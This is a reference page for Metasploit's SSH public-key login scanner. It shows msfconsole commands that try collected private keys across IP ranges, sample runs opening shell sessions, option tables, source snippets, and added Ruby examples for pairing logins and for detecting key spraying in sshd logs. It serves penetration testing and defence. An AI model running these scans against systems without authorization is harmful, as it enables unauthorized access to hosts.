SSH Public Key Login Scanner - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/ssh/ssh_login_pubkey Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SSH Public Key Login Scanner
Module: auxiliary/scanner/ssh/ssh_login_pubkey
Source code: modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
Disclosure date: -
Last modification time: 2021-10-22 17:24:26 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 22
List of CVEs: -
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single private key, or several private keys in a single directory. Only a single passphrase is supported however, so it must either be shared between subject keys or only belong to a single one.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > show options
... show and set options ...
msf auxiliary(ssh_login_pubkey) > set RHOSTS ip-range
msf auxiliary(ssh_login_pubkey) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(ssh_login_pubkey) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators. This module attempts to log in to SSH with username and private key combinations. For username and password logins, please use auxiliary/scanner/ssh/ssh_login. It should be noted that some modern Operating Systems have default configurations to not allow the root user to remotely log in via SSH, or to only allow root to log in with an SSH key login.
Key Generation
On most modern *nix Operating Systems, the ssh-keygen command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during ssh-keygen. After following the prompts to create the SSH key pair, the pub key needs to be added to the authorized_keys list. To do so simply run:
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
Verification Steps
- Install SSH and start it.
- Create an SSH keypair and add the public key to the authorized_keys file
- Start msfconsole
- Do: use auxiliary/scanner/ssh/ssh_login_pubkey
- Do: set rhosts
- Do: set usernames with one of the available options
- Do: set private keys with one or both of the available options
  - Do: set KEY_PATH to either a file or path
  - Do: set PRIVATE_KEY to file:PRIVATE_KEY_PATH
- Do: run
- You will hopefully see something similar to the following:
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
Session Capabilities
Like Meterpreter sessions, this newly established session can be used to pivot connections as defined by Metasploit's routing table. For more information, see the module docs for auxiliary/scanner/ssh/ssh_login.
Options
KEY_PATH
The path to a private key file to attempt, or a folder containing private keys to attempt. Any file name starting with a period (.) or ending in .pub will be ignored. An SSH key is typically kept in a user's home directory under .ssh/id_rsa. The file contents, when not encrypted with a password, will start with -----BEGIN RSA PRIVATE KEY-----
PRIVATE_KEY
A string of the private key to attempt. For MSFConsole users the option should be set to file:PRIVATE_KEY_PATH and it will read in the string value of the private key. Currently OpenSSH, RSA, DSA, and ECDSA private keys are supported.
STOP_ON_SUCCESS
If a valid login is found on a host, immediately stop attempting additional logins on that host.
USERNAME
Username to try for each password.
USER_FILE
A file containing a username on every line.
VERBOSE
Show a failed login attempt. This can get rather verbose when large USER_FILEs or KEY_PATHs are used. A failed attempt will look similar to the following: [-] SSH - Failed
Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in USERNAME, and be part of USER_FILE. This module makes a combination of all of the above when attempting logins. So if a username is set in USERNAME, and a USER_FILE is listed, usernames will be generated from BOTH of these.
Similar to USERNAME and USER_FILE, both KEY_PATH and PRIVATE_KEY can be set simultaneously and all unique combinations of these will be tested.
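The selection and pairing rules from the KEY_PATH and Option Combinations sections, as an added Ruby example (not the module's own code) that shows how many logins a given configuration produces. The helper names collect_keys and login_pairs and the sample directory are constructed for illustration; only the filename pattern is taken from the module source quoted on this page.

```ruby
require 'set'
require 'tmpdir'

# Filename filter quoted from the module source on this page:
# names starting with "." or ending in ".pub" are skipped.
SKIPPED_NAME = /^\x2e|\x2epub$/

# Hypothetical helper: unique key bodies from KEY_PATH (file or directory)
# plus an optional PRIVATE_KEY string. A Set drops duplicate keys.
def collect_keys(key_path: nil, private_key: nil)
  keys = Set.new
  if key_path && File.directory?(key_path)
    Dir.entries(key_path).reject { |f| f =~ SKIPPED_NAME }.sort.each do |f|
      full = File.join(key_path, f)
      keys << File.read(full) if File.file?(full)
    end
  elsif key_path && File.file?(key_path)
    keys << File.read(key_path)
  end
  keys << private_key if private_key
  keys
end

# Hypothetical helper: USERNAME and USER_FILE entries are merged, then every
# unique username is paired with every unique key.
def login_pairs(keys, username: nil, user_file_lines: [])
  users = ([username] + user_file_lines).compact.map(&:strip).reject(&:empty?).uniq
  users.product(keys.to_a)
end

# Constructed sample directory; file contents are stand-ins, not real keys.
def demo
  Dir.mktmpdir do |dir|
    { 'id_rsa' => "KEY-A\n", 'id_rsa.pub' => "PUB-A\n", 'backup' => "KEY-A\n",
      'deploy' => "KEY-B\n", '.old_key' => "KEY-C\n" }.each do |name, body|
      File.write(File.join(dir, name), body)
    end
    keys = collect_keys(key_path: dir, private_key: "KEY-B\n")
    pairs = login_pairs(keys, username: 'ubuntu', user_file_lines: %w[ubuntu deploy root])
    { keys: keys.size, pairs: pairs.size }
  end
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

Five files and one PRIVATE_KEY string collapse to two unique keys, and three unique usernames give six logins per host, which is the figure to compare against MaxGuessesPerService and the target's log volume.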
Scenarios
Example run with a FOLDER set for KEY_PATH against:
- Ubuntu 14.04 Server
While the two SSH keys are nearly identical, one character has been modified in one of the keys to prevent a successful login.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
key_path => /root/sshkeys/
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/sshkeys
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----[...]-----END RSA PRIVATE KEY-----
'
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----[...]-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Similar example but run with a KEY FILE set for PRIVATE_KEY:
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set private_key file:/root/sshkeys/id_rsa
private_key => -----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 1 keys from
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----[...]-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
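How a run like the first scenario appears in the target's sshd log, as an added Ruby example (not part of the original page or of Metasploit): it parses publickey results and flags a source that offered several different keys for one account. The log lines are constructed in OpenSSH's auth-log format and assume LogLevel VERBOSE so that individual failures are recorded; the function names, fingerprints and threshold are illustrative.

```ruby
require 'set'

# Constructed sample lines; addresses reuse the scenario above and the
# fingerprints are placeholders, not real key hashes.
SAMPLE_LOG = <<~LOG
  Feb 22 22:08:10 Ubuntu14 sshd[2101]: Failed publickey for ubuntu from 192.168.2.117 port 44178 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINTAAAA
  Feb 22 22:08:11 Ubuntu14 sshd[2103]: Accepted publickey for ubuntu from 192.168.2.117 port 44179 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINTBBBB
  Feb 22 22:09:40 Ubuntu14 sshd[2150]: Accepted publickey for ubuntu from 192.168.2.50 port 51022 ssh2: RSA SHA256:CONSTRUCTEDFINGERPRINTBBBB
  Feb 22 22:10:02 Ubuntu14 sshd[2188]: Failed publickey for invalid user admin from 192.168.2.60 port 40100 ssh2: ED25519 SHA256:CONSTRUCTEDFINGERPRINTCCCC
LOG

PUBKEY_EVENT = /sshd\[\d+\]: (?<result>Failed|Accepted) publickey for (?:invalid user )?(?<user>\S+) from (?<src>\S+) port \d+ ssh2: (?<type>\S+) (?<fp>\S+)/

# Turn auth-log text into one hash per publickey result line.
def parse_events(text)
  text.each_line.filter_map do |line|
    m = PUBKEY_EVENT.match(line)
    m && { result: m[:result], user: m[:user], src: m[:src], fp: m[:fp] }
  end
end

# Flag (source, user) pairs that presented at least min_keys distinct keys.
# A client with several agent keys can also trip this, so tune min_keys to
# the environment; 2 is used here only to match the two-key scenario.
def key_spray_findings(events, min_keys: 2)
  events.group_by { |e| [e[:src], e[:user]] }.filter_map do |(src, user), evs|
    fps = evs.map { |e| e[:fp] }.to_set
    next if fps.size < min_keys

    accepted = evs.select { |e| e[:result] == 'Accepted' }.map { |e| e[:fp] }.uniq
    { src: src, user: user, keys_offered: fps.size,
      failed: evs.count { |e| e[:result] == 'Failed' },
      accepted_keys: accepted } # non-empty: rotate these keys in authorized_keys
  end
end

if __FILE__ == $PROGRAM_NAME
  key_spray_findings(parse_events(SAMPLE_LOG)).each { |f| puts f.inspect }
end
```

Only 192.168.2.117 is reported: it offered two different keys for ubuntu, one of which was accepted, while the single-key login from 192.168.2.50 and the lone failure from 192.168.2.60 stay below the threshold.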
Msfconsole Usage
Here is how the scanner/ssh/ssh_login_pubkey auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show info
Name: SSH Public Key Login Scanner
Module: auxiliary/scanner/ssh/ssh_login_pubkey
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
todb
RageLtMan
Check supported:
No
Basic options:
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
KEY_PASS                           no        Passphrase for SSH private key(s)
KEY_PATH                           no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY                        no        The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads (max one per host)
USERNAME                           no        A specific username to authenticate as
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts
Description:
This module will test ssh logins on a range of machines using a
defined private key file, and report successful logins. If you have
loaded a database plugin and connected to a database this module
will record successful logins and hosts so you can track your
access. Key files may be a single private key, or several private
keys in a single directory. Only a single passphrase is supported
however, so it must either be shared between subject keys or only
belong to a single one.
Module Options
This is a complete list of options available in the scanner/ssh/ssh_login_pubkey auxiliary module:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show options
Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name              Current Setting  Required  Description
----              ---------------  --------  -----------
BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
DB_ALL_PASS       false            no        Add all passwords in the current database to the list
DB_ALL_USERS      false            no        Add all users in the current database to the list
KEY_PASS                           no        Passphrase for SSH private key(s)
KEY_PATH                           no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
PRIVATE_KEY                        no        The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT             22               yes       The target port
STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
THREADS           1                yes       The number of concurrent threads (max one per host)
USERNAME                           no        A specific username to authenticate as
USER_FILE                          no        File containing usernames, one per line
VERBOSE           true             yes       Whether to print output for all attempts
Advanced Options
Here is a complete list of advanced options supported by the scanner/ssh/ssh_login_pubkey auxiliary module:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show advanced
Module advanced options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name                        Current Setting                          Required  Description
----                        ---------------                          --------  -----------
AutoRunScript                                                        no        A script to run automatically on session creation.
AutoVerifySession           true                                     yes       Automatically verify and drop invalid sessions
CommandShellCleanupCommand                                           no        A command to run before the session is closed
CreateSession               true                                     no        Create a new session for every successful login
GatherProof                 true                                     yes       Gather proof of access via pre-session shell commands
InitialAutoRunScript                                                 no        An initial script to run on session creation (before AutoRunScript)
MaxGuessesPerService        0                                        no        Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
MaxGuessesPerUser           0                                        no        Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.
MaxMinutesPerService        0                                        no        Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
REMOVE_PASS_FILE            false                                    yes       Automatically delete the PASS_FILE on module completion
REMOVE_USERPASS_FILE        false                                    yes       Automatically delete the USERPASS_FILE on module completion
REMOVE_USER_FILE            false                                    yes       Automatically delete the USER_FILE on module completion
SSH_DEBUG                   false                                    no        Enable SSH debugging output (Extreme verbosity!)
SSH_IDENT                   SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3  yes       SSH client identification string
SSH_KEYFILE_B64                                                      no        Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.
SSH_TIMEOUT                 30                                       no        Specify the maximum time to negotiate a SSH session
ShowProgress                true                                     yes       Display progress messages during a scan
ShowProgressPercent         10                                       yes       The interval in percent that progress should be shown
TRANSITION_DELAY            0                                        no        Amount of time (in minutes) to delay before transitioning to the next user in the array (or password when PASSWORD_SPRAY=true)
WORKSPACE                                                            no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/ssh/ssh_login_pubkey module can do:
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show actions
Auxiliary actions:
Name  Description
----  -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/ssh/ssh_login_pubkey auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show evasion
Module evasion options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Files that failed to be read
Here is a relevant code snippet related to the "Files that failed to be read" error message:
      username: datastore['USERNAME'],
      private_key: datastore['PRIVATE_KEY']
    )

    unless keys.valid?
      print_error("Files that failed to be read:")
      keys.error_list.each do |err|
        print_line("\t- #{err}")
      end
    end
Could not connect: <RESULT.PROOF>
Here is a relevant code snippet related to the "Could not connect: <RESULT.PROOF>" error message:
        print_brute :level => :error, :ip => ip, :msg => msg
      end
      :next_user
    when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
      if datastore['VERBOSE']
        print_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
      end
      scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      invalidate_login(credential_data)
      :abort
    when Metasploit::Model::Login::Status::INCORRECT
Failed: '<RESULT.CREDENTIAL>'
Here is a relevant code snippet related to the "Failed: '<RESULT.CREDENTIAL>'" error message:
      scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      invalidate_login(credential_data)
      :abort
    when Metasploit::Model::Login::Status::INCORRECT
      if datastore['VERBOSE']
        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
      end
      invalidate_login(credential_data)
      scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
    else
      invalidate_login(credential_data)
No key path or key provided
Here is a relevant code snippet related to the "No key path or key provided" error message:
def valid?
  @error_list = []
  @key_data = Set.new

  unless @private_key.present? || @key_path.present?
    raise RuntimeError, "No key path or key provided"
  end

  if @key_path.present?
    if File.directory?(@key_path)
      @key_files ||= Dir.entries(@key_path).reject { |f| f =~ /^\x2e|\x2epub$/ }
<KEY_PATH> could not be read, <E>
Here is a relevant code snippet related to the "<KEY_PATH> could not be read, <E>" error message:
    elsif File.file?(@key_path)
      begin
        data = read_key(@key_path)
        @key_data << data if valid_key?(data)
      rescue StandardError => e
        @error_list << "#{@key_path} could not be read, #{e}"
      end
    else
      raise RuntimeError, "Invalid key path"
    end
  end
Invalid key path
Here is a relevant code snippet related to the "Invalid key path" error message:
        @key_data << data if valid_key?(data)
      rescue StandardError => e
        @error_list << "#{@key_path} could not be read, #{e}"
      end
    else
      raise RuntimeError, "Invalid key path"
    end
  end

  if @private_key.present?
    data = Net::SSH::KeyFactory.load_data_private_key(@private_key, @password, false).to_s
Invalid private key
Here is a relevant code snippet related to the "Invalid private key" error message:
  if @private_key.present?
    data = Net::SSH::KeyFactory.load_data_private_key(@private_key, @password, false).to_s
    if valid_key?(data)
      @key_data << data
    else
      raise RuntimeError, "Invalid private key"
    end
  end

  !@key_data.empty?
end
Related Pull Requests
- #15430 Merged Pull Request: Support for SSH pivoting
- #15359 Merged Pull Request: Fix bug 15218 authentication issue in ssh_login_pubkey
- #15014 Merged Pull Request: Added string PKey support for ssh module
- #14879 Merged Pull Request: Fix error when running ssh_login_pubkey.rb against a directory/file and improve error handling
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #13748 Merged Pull Request: off to false
- #13321 Merged Pull Request: ssh_login windows 10/2019 friendly, and 'submit unknown' banner.
- #13315 Merged Pull Request: flip gatherpoof
- #12024 Merged Pull Request: Add GatherProof advanced option to ssh_login*
- #12022 Merged Pull Request: Deregister PASSWORD_SPRAY option for LoginScanner modules
- #11340 Merged Pull Request: Add functionality to change Net::SSH's client identification string
- #11523 Merged Pull Request: MSF5: Remove unneeded RHOST deregister in scanners
- #11103 Merged Pull Request: Add CreateSession option to opt out of session creation in login modules
- #10819 Merged Pull Request: ssh_login* now populates the os_name field
- #9694 Merged Pull Request: move ssh platforms to lib
- #9614 Merged Pull Request: Juniper post enum module
- #9524 Merged Pull Request: prefer 'shell' channels over 'exec' channels for ssh CommandStream
- #9358 Merged Pull Request: Permit encrypted SSH keys for login scanner
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
See Also
Check also the following modules related to this module:
- auxiliary/scanner/ssh/ssh_enum_git_keys
- auxiliary/scanner/ssh/ssh_enumusers
- auxiliary/scanner/ssh/ssh_identify_pubkeys
- auxiliary/scanner/ssh/ssh_login
- auxiliary/scanner/ssh/ssh_version
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/scanner/ssh/cerberus_sftp_enumusers
- auxiliary/scanner/ssh/detect_kippo
- auxiliary/scanner/ssh/eaton_xpert_backdoor
- auxiliary/scanner/ssh/fortinet_backdoor
- auxiliary/scanner/ssh/juniper_backdoor
- auxiliary/scanner/ssh/karaf_login
- auxiliary/scanner/ssh/libssh_auth_bypass
- auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
- auxiliary/fuzzers/ssh/ssh_version_15
- auxiliary/fuzzers/ssh/ssh_version_2
- auxiliary/fuzzers/ssh/ssh_version_corrupt
- post/multi/gather/ssh_creds
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- exploit/dialup/multi/login/manyargs
Authors
- todb
- RageLtMan
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.